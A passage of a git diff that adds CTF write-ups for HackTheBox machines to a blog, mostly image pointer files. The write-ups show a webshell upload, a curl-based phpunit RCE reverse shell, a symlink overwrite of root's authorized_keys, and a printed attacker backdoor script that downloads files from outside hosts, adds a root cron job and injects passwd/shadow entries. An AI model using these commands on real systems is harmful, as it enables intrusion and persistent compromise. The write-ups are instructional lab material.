+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin +systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin +syslog:x:102:106::/home/syslog:/usr/sbin/nologin +messagebus:x:103:107::/nonexistent:/usr/sbin/nologin +_apt:x:104:65534::/nonexistent:/usr/sbin/nologin +lxd:x:105:65534::/var/lib/lxd/:/bin/false +uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin +dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin +landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin +pollinate:x:109:1::/var/cache/pollinate:/bin/false +sshd:x:110:65534::/run/sshd:/usr/sbin/nologin +mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false +aaron:x:1000:1000:aaron:/home/aaron:/bin/bash +``` +We find that there is a user `aaron` on the machine. I try to connect to the site with this user and basic passwords.  I end up connecting with the following credentials: `user: aaron, password: aaron`. + +I continue my exploration of the files by starting with `login.php`. + +![](img/image-6.webp) + +In this file I find a reference to the database connection file: `db_conn.php`. + + +```bash +$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd'); +``` +db\_conn.phpOk, we have a username and password for the mysql database and potentially a user... I tried to make an SSH session with this password and the user `aaron` but without success. + +I continue my research and find the mention of a new page in `upload.php` : `admin_auth_check.php`. 
+ + +```php + +``` +In this file we find that if the session variable `role` is equal to 1 we have access to the admin section of the site. + +In one of the javascript files we find the existence of another php page : `profile_update.php`. + + +```php +function updateProfile() { + var xml = new XMLHttpRequest(); + xml.onreadystatechange = function () { + if (xml.readyState == 4 && xml.status == 200) { + document.getElementById("alert-profile-update").style.display = "block" + } + }; + + xml.open("POST", "profile_update.php", true); + xml.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); + xml.send("firstName=" + document.getElementById("firstName").value + "&lastName=" + document.getElementById("lastName").value + "&email=" + document.getElementById("email").value + "&company=" + document.getElementById("company").value); +} +``` +![](img/image-7.webp) + +In this file we find that we can send during a POST request the `role` variable. I create a request with Burp with `role=1`, this should give me access to the admin panel of the site. + +![](img/image-8.webp) + +I continue my analysis of the php files of the site with `avatar_uploader.php` which brings me then to `upload.php`. + + +```php + +``` +In this file we learn several things: + +- Only `.jpg` files are accepted +- The uploaded images are stored in the folder `images/uploards/` +- The images take a name based on the string `$file_hash` and the function time() + +💡In PHP single quotes are strings and double quotes are the values of the variable.So we will have to make a script to calculate the first part of the file name. I realize this script in PHP, every second it will give a possible hash to use for the name of the uploaded file. + + +```php +}} +Before doing the manipulation, it is necessary to check that your clock is well synchronized with the Internet (`timedatectl`). 
If this is not the case, you can activate it with the following command: `timedatectl set-ntp yes`.I create an image `d3vyce.jpg` with the following content: +{{< /alert >}} + +```php + +``` +I then run the php script : + +![](img/image-9.webp) + +Then I upload the image on the server. All that's left to do is to make requests with the different hash possibilities. + +![](img/image-10.webp) + +I can now send commands to the target server. It's not ideal, but I also tried with a reverse shell, but without success... + +![](img/image-11.webp) + +After some time of enumeration, I find a `source-files-backup.zip` file in the `/otp` folder. + +To recover this file, I make a copy to the folder where the website is stored: + + +```bash +curl 'http://10.10.11.135/image.php?img=images/uploads/0fdde4bab214a9a96630c16ac87bf0d4_d3vyce.jpg&cmd=cp+/opt/source-files-backup.zip+/var/www/html/' +``` +I can now retrieve the file by accessing the address `http://10.10.11.135/source-files-backup.zip`. After unzipping the zip I find the tree structure : + +![](img/image-12.webp) + +This is a GIT project, so I check the history with the following command: + +![](img/image-13.webp) + +In the last commit, there was a modification on the file in which we found credencials. Let's see what has been modified in this file: + +![](img/image-14.webp) + +There has been a password change! Let's try this new password to create an SSH session with the user `aaron`. + +![](img/image-15.webp) + +I now have a shell and can retrieve the first flag. + +## Privilege escalation + +For elevation of privilege I first check if the user has sudo access: + +![](img/image-16.webp) + +So I can use the `netutils` service with root rights. Let's see what this program does: + +![](img/image-17.webp) + +This program allows you to download files via FTP or HTTP. + +![](img/image-18.webp) + +Once the file is downloaded, I notice that it does not belong to me but to the root user! 
+ +What we will be able to do is to make a symbolic link of the file `/root/.ssh/authorized_keys` and then upload a file with the same name so that the content is overwritten and replaced by our public key. + +To do this I create the symbolic link with the following command: + + +```bash +ln -s /root/.ssh/authorized_keys authorized_keys +``` +![](img/image-19.webp) + +Then before launching a file server in which I placed a file `authorized_keys` with my public key inside. + +I download the file with the program `netutils` : + +![](img/image-20.webp) + +I now connect to the root user via SSH : + +![](img/image-21.webp) + +I can now recover the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not use the same login/password +- Fix the php argument to avoid enumeration +- Do not use a user's password for the mysql database +- Do not give sudo rights to a program that does not need them diff --git a/content/writeup-ctf/writeup-undetected-htb/featured.png b/content/writeup-ctf/writeup-undetected-htb/featured.png new file mode 100644 index 0000000..d5f8ef6 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:963c8b49c308e3a4a1297e241445d9aaee00bfe2f32c04c253c5db6e1b41f027 +size 256365 diff --git a/content/writeup-ctf/writeup-undetected-htb/featured.webp b/content/writeup-ctf/writeup-undetected-htb/featured.webp new file mode 100644 index 0000000..51548f9 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bb90f770285d83178892a15333d06dec50497fb7ff360d8c6d14e8f799b4b60f +size 27888 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-1.png b/content/writeup-ctf/writeup-undetected-htb/img/image-1.png new file mode 100644 index 0000000..4fd9e88 --- /dev/null 
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f2c89f7864ee1b755081af7b4a2f8fe106f7197cf6d40a22634b45df44e1abda +size 37947 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-1.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-1.webp new file mode 100644 index 0000000..11280e1 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c328baed7dfb5f86667a89115e1bd16b48a7abffe4a8bc10b9b90058a511714d +size 29180 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-10.png b/content/writeup-ctf/writeup-undetected-htb/img/image-10.png new file mode 100644 index 0000000..fbc6905 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8b979d0d2f85f4c32dd0a091121493298d2bb28257aff3b3e275efbbf8127b2 +size 22346 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-10.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-10.webp new file mode 100644 index 0000000..945eae3 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:548450b30532e9752b664b1d6209adfbcc801a6ed9ce9cd414d9108cd9cb69bc +size 26692 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-11.png b/content/writeup-ctf/writeup-undetected-htb/img/image-11.png new file mode 100644 index 0000000..03db2e7 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6226d76132fb29431c5fdd1f5dfbb163b9fce05354cecd2e302af401f2fbeba9 +size 13513 
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-11.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-11.webp new file mode 100644 index 0000000..8d1cd87 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c1b9ec7a173c6d3273e35489a980c3c6ec358ee8d4f1c1631779c220b8955760 +size 11912 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-2.png b/content/writeup-ctf/writeup-undetected-htb/img/image-2.png new file mode 100644 index 0000000..d897dbc --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b93994f5e30ea46d8804ce18490231b82c78de984e92f75170aa3f08a42367f8 +size 707863 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-2.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-2.webp new file mode 100644 index 0000000..c1d8d33 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41a2aaeac7ad2a554f7f515e0a35910f095acb1b11cb9a4672d60b10f05c9029 +size 105252 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-3.png b/content/writeup-ctf/writeup-undetected-htb/img/image-3.png new file mode 100644 index 0000000..c26d727 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0961533532df1b04d212a67bd8f489be432593fa3344a45994f88a495c1fd1c9 +size 771609 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-3.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-3.webp new file mode 100644 index 0000000..ee23a58 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-3.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:54b6b7557b35d89a18add7ce3cb5570b2ff50bc216be74f982a6b43cd828a2f9 +size 106284 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-4.png b/content/writeup-ctf/writeup-undetected-htb/img/image-4.png new file mode 100644 index 0000000..288f6ac --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3535bc6774dd9bf2ca87c615e51580877ccb2ffad2d112e889ab46389fe64beb +size 75824 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-4.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-4.webp new file mode 100644 index 0000000..06f9200 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:609e1804a698b4f0e0dcfaa1f88cf0a469c160d99cf0c9e309c6162a418f3133 +size 49038 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-5.png b/content/writeup-ctf/writeup-undetected-htb/img/image-5.png new file mode 100644 index 0000000..929c13e --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f987b24c95e5109468a2c61bb1f373658d022955123ecf8ecde3cc1c9ecfd2df +size 149920 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-5.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-5.webp new file mode 100644 index 0000000..594e0bc --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e586edba87e5e2b5dd87dc73f27a98d551e9685f87eb33fce6cf54df9490eb5 +size 126184 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-6.png b/content/writeup-ctf/writeup-undetected-htb/img/image-6.png new file mode 100644 index 0000000..aebb481 --- /dev/null 
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a7142b295523f882a236fbb896532359671f34a92d37b2693a36eedfb62e9ade +size 40215 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-6.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-6.webp new file mode 100644 index 0000000..be4bbe3 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9badc803bc9351be412793bdd6d96832ac837fc3f3ea572afac5805d08eea94c +size 28898 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-7.png b/content/writeup-ctf/writeup-undetected-htb/img/image-7.png new file mode 100644 index 0000000..36df5f5 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b62c34975df94f96e19b23fb29574a68ff5df6098011afcf3f34f192b6ea115a +size 55703 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-7.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-7.webp new file mode 100644 index 0000000..59643b7 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50aafb992cad3a47977f76f3d4c6781a5b9777b5d3d7769e7f1442bc5d35f865 +size 37728 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-8.png b/content/writeup-ctf/writeup-undetected-htb/img/image-8.png new file mode 100644 index 0000000..157c037 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:796988e9b8d51806a19bc8026e7d84b831d8cc82ae1cec6c6b444c95d8db9974 +size 72422 
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-8.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-8.webp new file mode 100644 index 0000000..79241f6 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:68d4056659c848c8ecbf3d1c1774d47ba09830c2eac377ca0350359175e47f20 +size 51648 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-9.png b/content/writeup-ctf/writeup-undetected-htb/img/image-9.png new file mode 100644 index 0000000..d9c2a5d --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:808015e3d80a2b00eebaf29e4de90c8eab94ddbdbe1dcefca72898e188bb7fd3 +size 25832 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-9.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-9.webp new file mode 100644 index 0000000..6c6209c --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d82211f286103e07893d119c16e8f36aaf3fb70231ce31db982eb48d3f8e2b6a +size 22102 diff --git a/content/writeup-ctf/writeup-undetected-htb/index.md b/content/writeup-ctf/writeup-undetected-htb/index.md new file mode 100644 index 0000000..e443b34 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/index.md 
@@ -0,0 +1,167 @@ +--- +title: "Writeup - Undetected (HTB)" +date: 2022-04-09 +slug: "writeup-undetected-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Undectected](https://app.hackthebox.com/machines/Undetected) machine from  the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.146 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2) +- 80/tcp : HTTP web server (Apache 2.4.41) + +![](img/image-2.webp) + +## Exploit + +While going on the site I notice that there is a subdomain, so I add it in the /etc/hosts file: + + +```bash +10.10.11.146 store.djewelry.htb +``` +![](img/image-3.webp) + +I arrive on a new part of the site : the store. I start by searching for a folder with gobuster : + + +```bash +gobuster dir -u http://store.djewelry.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt +``` +I quickly find the "/vendor" folder: + +![](img/image-4.webp) + +A lot of potential exploit... After some research I find that this version of "phpunit" has an exploit allowing to execute remote commands via PHP ([CVE-2017-9841](https://gist.github.com/yassineaboukir/1501de6f60dce148824d3001e83fb263)). + + +```bash +┌──(kali㉿kali)-[~] +└─$ curl --data "" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php +uid=33(www-data) gid=33(www-data) groups=33(www-data) +``` +So I will be able to use this exploit to create a reverse shell. To do this I open a port with "nc", then I use the following command to start the session: + + +```bash +curl --data '$sock, 1=>$sock, 2=>$sock),$pipes); ?>' http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php + +``` +I now have a reverse shell. I'll do a first scan with [linPeas](lingeas.sh). After some analysis, I find a suspicious file in the "/var/backups" folder. 
After retrieving the file on my PC, I extract the information with the "strings" command. + +In the result of the command I find a large hexadecimal character string that I decipher with the site [Hex decode](https://www.convertstring.com/EncodeDecode/HexDecode). + +![](img/image-5.webp) + +It is a sequence of commands: + + +```bash +wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; +wget tempfiles.xyz/.main -O /var/lib/.main; +chmod 755 /var/lib/.main; +echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; +awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; +do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt; +``` +One element is of particular interest to us, the hash of a user's password. I retrieve it and try to crack it with "john". + +![](img/image-6.webp) + +After a few seconds john finds the password: ihatehackers. + +We don't have the user name, but during the linPeas scan, I found that there were 2 users besides root: steven & steven1. + +Let's try with the two users: + +![](img/image-7.webp) + +So this is the password of steven1! I now have access to the first flag of the machine. + +## Privilege escalation + +Let's go back to our LinPeas scan. I noticed that the user steven had a mail in the folder "/var/mail" : + +![](img/image-8.webp) + +Globally the sysadmin tells us that there is a problem with apache, let's go and see in the apache folder if we notice any unusual elements. + +In the molules folder, there are a lot of elements, but when I look at the modification dates, I notice that they have the same date except one : mod\_reader.so. 
+ + +```bash +ls -l /usr/lib/apache/modules +``` +![](img/image-9.webp) + +I get the file on my computer and get the information with the command "strings". And as usual there is a big string, but this time in base64. I decrypt it with the following command : + + +```bash +┌──(kali㉿kali)-[~/Downloads] +└─$ echo "d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk" | base64 -d +wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd +``` +These are 2 commands that use the program "sshd", so I get the ssdh file for analysis with ghidra. + +After the analysis of ghidra, I look if there are not unusual variables or functions. And I find a function that attracts my attention: auth\_password. + +In this function I find the backdoor's signature and a sequence of hexadecimal characters composing a password. Let's try to recompose the password! + +![](img/image-10.webp) + +At first I put back in order the password bits. I notice that the first byte is negative, but when I right click on the value, ghidra tells me that it corresponds to "0xa5". + + +```bash +30_1 0xa5 +28_2 0xa9f4 +24_4 0xbcf0b5e3 +16_8 0xb2d6f4a0fda0b3d6 +12_4 0xfdb3d6e7 +8_4 0xf7bbfdc8 +4_4 0xa4b3a3f3 +0_4 0xf0e7abd6 +``` + In total, I find that it corresponds to 31 bytes, it's a good sign it's the size of the "backdoor" variable! + +I notice that at the end of the processing the following calculation is done: "\*pbVar4 = bVar7 ^ 0x96". This corresponds to an XOR with the value 96. + +I have all the elements, so I should be able to find the password with the help of [CyberChef](https://gchq.github.io/CyberChef). I add the following modules: + +- Swap endianness -> 31 word length +- From Hex +- XOR -> key : 96 + +{{< alert icon="circle-info" >}} +The "Swap endianness" function allows to convert little endian and big endian (or vice versa). 
These are two possibilities to store information.At the end cyberchef returns the following string: +{{< /alert >}} + +```bash +@=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3 +``` +Let's try to connect to root with this password: + +![](img/image-11.webp) + +And it works, so I can get the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Mettre a jour phpunit pour la dernière version +- Do not leave files with hashes visible to everyone / use stronger passwords +- Use key authentication for ssh root connection diff --git a/content/writeup-ctf/writeup-unicode-htb/featured.png b/content/writeup-ctf/writeup-unicode-htb/featured.png new file mode 100644 index 0000000..8efb15a --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1424deefc3bd5a9009ecb5bc81aea80fe2d4c22d4b8733dc09a5461375a6a664 +size 263343 diff --git a/content/writeup-ctf/writeup-unicode-htb/featured.webp b/content/writeup-ctf/writeup-unicode-htb/featured.webp new file mode 100644 index 0000000..5dc5c0f --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ca991bf1154421894698236d46037e0fde2983ce131f7dd695acebe1cda306aa +size 26162 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-1.png b/content/writeup-ctf/writeup-unicode-htb/img/image-1.png new file mode 100644 index 0000000..3fdd68d --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b13cc401f297db1292816f1ee790ed7490daf2bd1d0860e0b9dfece950f0a251 +size 35330 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-1.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-1.webp new file mode 100644 index 0000000..c4feca0 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-1.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e798a235addfd1b574b46baafa279c7ae599ad243d54df0f2f089bb2129f5b3 +size 33810 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-10.png b/content/writeup-ctf/writeup-unicode-htb/img/image-10.png new file mode 100644 index 0000000..2cda667 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:316870d53eab1c429a6483822119761aefd0c097996615147dbd2a3ebbbccd8a +size 135430 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-10.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-10.webp new file mode 100644 index 0000000..a801d49 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f65102bfaaf059e3cf21efb9461748221431f51c25e7ed30bccb7a8e0b974db +size 107204 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-11.png b/content/writeup-ctf/writeup-unicode-htb/img/image-11.png new file mode 100644 index 0000000..62a895d --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:503b7cbd2e7330b1b85deebaa72e4875841da6b88439b0489ca651044643bd35 +size 98261 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-11.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-11.webp new file mode 100644 index 0000000..bbbb292 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a787f6525e92debcedcc5448cf323be5fe0598866820429f0a356a140feef8bd +size 47326 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-12.png b/content/writeup-ctf/writeup-unicode-htb/img/image-12.png new file mode 100644 index 0000000..31bf304 --- /dev/null 
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79f87fceac5cd639928f5e75ffa5588c74c3d5ba5d3d1c70b68b38fff9aef0e4 +size 67086 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-12.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-12.webp new file mode 100644 index 0000000..8a32ed4 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:269b68043e8e00df762c13d267d86986dbcf041284cc25d6d440f6922f991e11 +size 83128 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-13.png b/content/writeup-ctf/writeup-unicode-htb/img/image-13.png new file mode 100644 index 0000000..b6734ae --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d785161f7afa040a36a3892661c4280d6a44d2c2af1aec5ffb968f730af11490 +size 13953 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-13.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-13.webp new file mode 100644 index 0000000..a7268d7 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ade238fb0e2da475cb4208fd7416de4104344cc4b99a3eb0a731d1a1e8ffdb79 +size 16720 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-14.png b/content/writeup-ctf/writeup-unicode-htb/img/image-14.png new file mode 100644 index 0000000..fbcdd39 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4acd80930d98b07e04b0b56784fa9749dbbf0ba4c9b77707851a34f5d9d1c1a7 +size 32401 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-14.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-14.webp new file mode 100644 index 0000000..7727282 
--- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42eec09f9d8c38879986a1b3b5e5ed8108ca59f9756a45133beb1a0c90f49e6a +size 30716 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-15.png b/content/writeup-ctf/writeup-unicode-htb/img/image-15.png new file mode 100644 index 0000000..395a0c0 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-15.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a2558b2eb5f6c7dfce8c053a44347cbee78700b0e48a099904daa842b287e04 +size 10139 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-15.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-15.webp new file mode 100644 index 0000000..6467a50 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-15.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:110cd0b17edc1d7602c1b98feab040dac79b1d83f743d31aa879f7e426c7add8 +size 11012 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-16.png b/content/writeup-ctf/writeup-unicode-htb/img/image-16.png new file mode 100644 index 0000000..0004754 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-16.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e873cf88988cd26bb853ddd493a140bedfc3d27584fad2cc47ba5bafff2da729 +size 46992 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-16.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-16.webp new file mode 100644 index 0000000..e503d18 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-16.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0cf756d4794ed6c556d1f35af8414290055a305ec27dc86d4d62b1aedf1ba5c +size 67160 
